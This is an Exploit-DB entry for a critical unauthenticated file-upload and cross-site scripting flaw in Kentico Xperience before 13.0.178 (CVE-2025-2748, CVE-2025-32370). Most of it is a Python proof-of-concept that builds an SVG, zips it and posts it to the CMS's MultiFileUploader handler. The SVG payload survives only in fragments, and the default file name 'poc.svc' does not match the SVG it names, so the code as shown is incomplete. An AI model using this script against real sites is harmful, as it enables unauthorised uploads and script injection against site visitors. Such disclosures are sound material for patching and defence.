Kentico Xperience 13.0.178 – Cross Site Scripting (XSS)

Exploit Details

Basic Information

Exploit Title: Kentico Xperience 13.0.178 – Cross Site Scripting (XSS)
Exploit ID: EDB-ID:52290
Type: exploitdb
Published: 2025-05-13T00:00:00
Modified: 2025-05-13T00:00:00

CVSS Information

CVSS Score: 9.8
Severity: CRITICAL
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE Information

  • CVE-2025-2748
  • CVE-2025-32370

Exploit Description

Exploit Title: Kentico Xperience 13.0.178 – Cross Site Scripting (XSS)…

Exploit Code

```python
# Exploit Title: Kentico Xperience 13.0.178 – Cross Site Scripting (XSS)
# Date: 2025-05-09
# Version: Kentico Xperience before 13.0.178
# Exploit Author: Alex Messham
# Contact: [email protected]
# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178—XSS-POC/
# CVE: CVE-2025-32370

import requests
import subprocess
import os
import argparse


def create_svg_payload(svg_filename: str):
    """Write the SVG file that will be placed inside the zip archive."""
    print(f"[*] Writing malicious SVG to: {svg_filename}")
    # Only these fragments of the SVG markup survive in the source listing;
    # the surrounding document and element content are not shown there.
    svg_payload = '''
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
xmlns="http://www.w3.org/2000/svg">
'''
    with open(svg_filename, 'w') as f:
        f.write(svg_payload)


def zip_payload(svg_filename: str, zip_filename: str):
    """Wrap the SVG in a zip archive using the system `zip` binary."""
    print(f"[*] Creating zip archive: {zip_filename}")
    subprocess.run(['zip', zip_filename, svg_filename], check=True)


def upload_zip(zip_filename: str, target_url: str):
    """POST the archive to the upload handler as a raw octet stream."""
    full_url = f"{target_url}?Filename={zip_filename}&Complete=false"
    headers = {
        "Content-Type": "application/octet-stream"
    }
    print(f"[+] Uploading {zip_filename} to {full_url}")
    with open(zip_filename, 'rb') as f:
        response = requests.post(full_url, headers=headers, data=f,
                                 verify=False)
    if response.status_code == 200:
        print("[+] Upload succeeded")
    else:
        print(f"[-] Upload failed with status code {response.status_code}")
        print(response.text)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2025-2748 - Unauthenticated ZIP file upload "
                    "with embedded SVG for XSS.")
    parser.add_argument("--url", required=True,
                        help="Target upload URL "
                             "(e.g. https://example.com/CMSModules/…/MultiFileUploader.ashx)")
    parser.add_argument("--svg", default="poc.svc",
                        help="SVG filename to embed inside the zip")
    parser.add_argument("--zip", default="exploit.zip",
                        help="Name of the output zip file")
    args = parser.parse_args()

    create_svg_payload(args.svg)
    zip_payload(args.svg, args.zip)
    upload_zip(args.zip, args.url)
```
